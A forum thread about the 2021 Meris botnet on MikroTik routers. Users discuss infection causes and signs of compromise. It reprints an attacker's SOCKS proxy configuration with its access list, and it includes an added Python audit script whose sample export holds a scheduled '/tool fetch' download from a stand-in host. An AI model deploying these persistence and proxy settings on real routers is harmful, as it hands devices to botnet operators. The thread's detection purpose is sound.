R1CH
Forum Guru
Topic Author
Posts: 1098
Joined: Sun Oct 01, 2006 11:44 pm

200k Mikrotik devices involved in DDoS botnet

Thu Sep 09, 2021 6:21 pm

Looks like there is a new DDoS botnet on the loose, comprised of Mikrotik devices.
We do not know precisely what particular vulnerabilities lead to the situation where Mikrotik devices are being compromised on such a large scale. Several records at the Mikrotik forum indicate that its customers experienced hacking attempts on older versions of RouterOS, particularly 6.40.1 from 2017. If this is correct and we see that old vulnerability still being active on thousands of devices being unpatched and unupgraded, this is horrible news. However, our data with Yandex indicates that this is not true – because the spectrum of RouterOS versions we see across this botnet varies from years old to recent. The largest share belongs to the version of firmware previous to the current Stable one.
https://blog.qrator.net/en/meris-botnet ... ecord_142/

This is scary - how are devices running 6.48.3 being infected? If there was a weak admin password and no firewall I could understand them being compromised, but the attacker should still be limited to boring things like running proxies and VPNs and whatever other functions exist in RouterOS. A scripted fetch attack also wouldn't generate such high levels of traffic, the fact that they can be used for a DDoS with a HTTP pipelining attack implies that the device has been rooted to run arbitrary code which shouldn't be possible with modern RouterOS versions. Is there a new exploit going around?

rextended
Forum Guru
Posts: 11967
Joined: Tue Feb 25, 2014 12:49 pm
Location: Italy
Contact:

Re: 200k Mikrotik devices involved in DDoS botnet

Thu Sep 09, 2021 6:30 pm

One simple thing: NAT

If one internal non-MikroTik device is infected, this appears to be coming from the router....
In how many % of the cases is the router not involved at all???
 
anav
Forum Guru
Posts: 18958
Joined: Sun Feb 18, 2018 11:28 pm
Location: Nova Scotia, Canada
Contact:

Re: 200k Mikrotik devices involved in DDoS botnet

Thu Sep 09, 2021 6:39 pm

Perhaps related to the recent blocking of the MT cloud service??
 
Paternot
Forum Veteran
Posts: 953
Joined: Thu Jun 02, 2016 4:01 am
Location: Niterói / Brazil

Re: 200k Mikrotik devices involved in DDoS botnet

Thu Sep 09, 2021 6:53 pm

This is scary - how are devices running 6.48.3 being infected?
Maybe they were infected earlier, and just upgraded without netinstall?
 
Anastasia
Frequent Visitor
Posts: 55
Joined: Wed Oct 28, 2015 7:12 pm

Re: 200k Mikrotik devices involved in DDoS botnet

Thu Sep 09, 2021 9:06 pm

what are the signs that the device is infected?
for example: the presence of extraneous scripts, the presence of a new user who was recently created or something else?
 
rextended
Forum Guru
Posts: 11967
Joined: Tue Feb 25, 2014 12:49 pm
Location: Italy
Contact:

Re: 200k Mikrotik devices involved in DDoS botnet

Thu Sep 09, 2021 9:09 pm

Usually SOCKS open, and a script on the scheduler, some downloaded files on the fly or undeletable files, VPN, etc.
 
jspool
Member
Posts: 468
Joined: Sun Oct 04, 2009 4:06 am
Location: Oregon

Re: 200k Mikrotik devices involved in DDoS botnet

Fri Sep 10, 2021 4:56 am

The instances I have seen are from poor password and update policies as well as not limiting management access to the routers. Some had old RouterOS versions that were exploited and the user/pass was obtained and used on other Mikrotik routers that were running newer versions but utilizing the same user/pass.

Example of one that was compromised:
/ip socks
set enabled=yes max-connections=500 port=5678
/ip socks access
add src-address=77.238.240.0/24
add src-address=178.239.168.0/24
add src-address=77.238.228.0/24
add src-address=94.243.168.0/24
add src-address=213.33.214.0/24
add src-address=31.172.128.45
add src-address=31.172.128.25
add src-address=10.0.0.0/8
add src-address=185.137.233.251
add src-address=5.9.163.16/29
add src-address=176.9.65.8
add src-address=82.202.248.5
add src-address=95.213.193.133
add src-address=136.243.238.211
add src-address=178.238.114.6
add src-address=46.148.232.205
add src-address=138.201.170.176/29
add src-address=178.63.52.200/29
add src-address=136.243.90.80/29
add src-address=136.243.21.232/29
add src-address=95.213.221.0/24
add src-address=159.255.24.0/24
add src-address=31.184.210.0/24
add src-address=188.187.119.0/24
add src-address=188.233.1.0/24
add src-address=188.233.5.0/24
add src-address=188.233.13.0/24
add src-address=188.232.101.0/24
add src-address=188.232.105.0/24
add src-address=188.232.109.0/24
add src-address=176.212.165.0/24
add src-address=176.212.169.0/24
add src-address=176.212.173.0/24
add src-address=176.213.161.0/24
add src-address=176.213.165.0/24
add src-address=176.213.169.0/24
add src-address=5.3.113.0/24
add src-address=5.3.117.0/24
add src-address=5.3.121.0/24
add src-address=5.3.145.0/24
add src-address=5.3.149.0/24
add src-address=5.3.153.0/24
add src-address=5.167.9.0/24
add src-address=5.167.13.0/24
add src-address=5.167.17.0/24
add src-address=94.180.1.0/24
add src-address=94.180.5.0/24
add src-address=94.180.9.0/24
add src-address=217.119.22.83
add src-address=192.243.53.0/24
add src-address=192.243.55.0/24
add src-address=176.9.65.8
add src-address=135.181.15.102
add src-address=198.18.0.0/15
add src-address=139.99.94.160/29
add src-address=5.188.119.191
add src-address=178.63.52.202
add src-address=136.243.21.233
add src-address=136.243.90.81
add src-address=94.130.223.9
add action=deny src-address=0.0.0.0/0
 
Znevna
Forum Guru
Posts: 1347
Joined: Mon Sep 23, 2019 1:04 pm

Re: 200k Mikrotik devices involved in DDoS botnet

Fri Sep 10, 2021 7:25 am

Ah, so the hackers use socks, that's why it's still in RouterOS.
 
mkamenjak
newbie
Posts: 41
Joined: Tue Jul 13, 2021 12:49 pm

Re: 200k Mikrotik devices involved in DDoS botnet

Fri Sep 10, 2021 9:23 am

Perhaps future RouterOS versions should separate SOCKS into a separate package. I mean, in the thousands of MikroTiks that I have logged in to, the only time I have seen it being used was on routers that were previously hacked.
 
mkamenjak
newbie
Posts: 41
Joined: Tue Jul 13, 2021 12:49 pm

Re: 200k Mikrotik devices involved in DDoS botnet

Fri Sep 10, 2021 9:23 am

what are the signs that the device is infected?
for example: the presence of extraneous scripts, the presence of a new user who was recently created or something else?
Check for scripts, schedulers, and if IP socks was used.
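As an added example (not code from the forum, MikroTik or the Qrator post), here is a Python check that turns the indicators named in rextended's and mkamenjak's replies, and the SOCKS export jspool posted, into an audit of a saved `/export`. The sample export embedded in it is constructed for the example; the script and scheduler name U6, the user "service" and the example.invalid URL are hypothetical placeholders, and the parser only handles the add/set lines of a plain export.

```python
"""Audit a RouterOS "/export" for the compromise indicators named in this
thread: SOCKS proxy enabled, a SOCKS access list admitting non-private
sources, scheduler entries, stored scripts (especially ones calling
/tool fetch) and extra full-rights users.  Added example, not from the
forum or from MikroTik."""
import ipaddress
import shlex

# Constructed sample export, trimmed to the sections that matter.  The names
# "U6" and "service" and the example.invalid URL are hypothetical.
SAMPLE_EXPORT = """\
# sep/10/2021 04:50:00 by RouterOS 6.48.3
/ip socks
set enabled=yes max-connections=500 port=5678
/ip socks access
add src-address=10.0.0.0/8
add src-address=77.238.240.0/24
add src-address=31.172.128.45
add action=deny src-address=0.0.0.0/0
/system scheduler
add interval=10m name=U6 on-event=U6 policy=\\
    ftp,reboot,read,write,policy,test,password,sniff,sensitive,romon \\
    start-time=startup
/system script
add name=U6 owner=admin policy=\\
    ftp,reboot,read,write,policy,test,password,sniff,sensitive,romon source=\\
    "/tool fetch url=http://example.invalid/x.rsc mode=http"
/user
add group=full name=service
add group=read name=monitor
"""

PRIVATE = [ipaddress.ip_network(n)
           for n in ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16")]


def parse_export(text):
    """Return (section, verb, params) for each add/set line of an export.
    Minimal on purpose: it handles comment lines, backslash line-wrapping
    and quoted values, but does not interpret '[ find ... ]' selectors."""
    entries, section, pending = [], None, ""
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        if line.endswith("\\"):      # RouterOS wraps long lines with a trailing '\'
            pending += line[:-1]
            continue
        line, pending = pending + line, ""
        if line.startswith("/"):      # section header such as "/ip socks access"
            section = line
            continue
        tokens = shlex.split(line)    # respects the "..." quoting of script sources
        params = dict(tok.split("=", 1) for tok in tokens[1:] if "=" in tok)
        entries.append((section, tokens[0], params))
    return entries


def is_private(cidr):
    """True when the whole src-address range lies inside RFC 1918 space."""
    try:
        net = ipaddress.ip_network(cidr, strict=False)
    except ValueError:
        return False
    return any(net.version == p.version and net.subnet_of(p) for p in PRIVATE)


def audit(export_text):
    """Return human-readable findings; an empty list means none of the
    thread's indicators appeared in the export (not proof of a clean box)."""
    findings = []
    for section, verb, p in parse_export(export_text):
        if section == "/ip socks" and verb == "set" and p.get("enabled") == "yes":
            findings.append(f"SOCKS proxy enabled on port {p.get('port', '1080')}")
        elif section == "/ip socks access" and verb == "add":
            src = p.get("src-address", "")
            if p.get("action", "allow") != "deny" and src and not is_private(src):
                findings.append(f"SOCKS access allowed from outside source {src}")
        elif section == "/system scheduler" and verb == "add":
            findings.append(f"scheduler {p.get('name')!r} runs {p.get('on-event')!r} "
                            f"every {p.get('interval')} from {p.get('start-time')}")
        elif section == "/system script" and verb == "add":
            note = " (calls /tool fetch)" if "/tool fetch" in p.get("source", "") else ""
            findings.append(f"stored script {p.get('name')!r}{note}")
        elif section == "/user" and verb == "add" and p.get("group") == "full":
            findings.append(f"extra full-rights user {p.get('name')!r}")
    return findings


if __name__ == "__main__":
    for finding in audit(SAMPLE_EXPORT):
        print("!", finding)
```

Run `/export file=check` on the router, copy the .rsc file off and feed its text to audit(). A plain `/export` omits settings still at their defaults (use `/export verbose` to see them), so an empty result only says the listed indicators are absent; Paternot's point above about upgrading without netinstall still applies to a device you suspect was already compromised.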
 
JelleM
just joined
Posts: 10
Joined: Fri Aug 31, 2018 1:33 pm

Re: 200k Mikrotik devices involved in DDoS botnet

Fri Sep 10, 2021 10:27 am

What worries me is that they all seem to have port 2000 open (Bandwidth Test Server), that could be either an infection vector (vulnerability in implementation) or because of a lacking default firewall (btest server is running by default).
